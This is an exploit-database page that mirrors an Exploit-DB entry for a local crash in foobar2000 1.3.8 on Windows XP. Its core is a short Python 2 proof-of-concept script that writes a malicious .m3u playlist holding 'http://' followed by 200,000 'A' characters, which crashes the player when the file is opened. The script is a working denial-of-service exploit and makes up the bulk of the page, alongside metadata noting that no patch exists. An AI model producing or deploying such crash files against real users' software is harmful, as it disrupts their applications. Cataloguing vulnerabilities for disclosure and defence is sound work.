header-logo
Suggest Exploit
vendor:
foobar2000
by:
0neb1n
N/A
CVSS
N/A
Local Crash
CWE
Product Name: foobar2000
Affected Version From: 1.3.2008
Affected Version To: 1.3.2008
Patch Exists: NO
Related CWE:
CPE: foobar2000
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 KOR
2015

foobar2000 1.3.8 (.m3u) Local Crash PoC

This exploit creates a malicious .m3u file that causes a local crash in foobar2000 version 1.3.8 on Windows XP SP3 KOR. The file contains a long URL string which triggers the crash when opened in the software.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
# Date: 12-06-2015
# Exploit Author: 0neb1n
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
# Version: 1.3.8
# Tested on: Windows XP SP3 KOR

file = "poc.m3u"

data = 'http://' + '\x41' * 200000

fd = open(file, 'w')
fd.write(data)
fd.close()
print ""
print "[*] File successfully created !!"
print "[*] Author : 0neb1n"
print "[*] Mail : barcodecrow(at)gmail(dot)com"

Navigation

Suggest Exploit

Services By CQR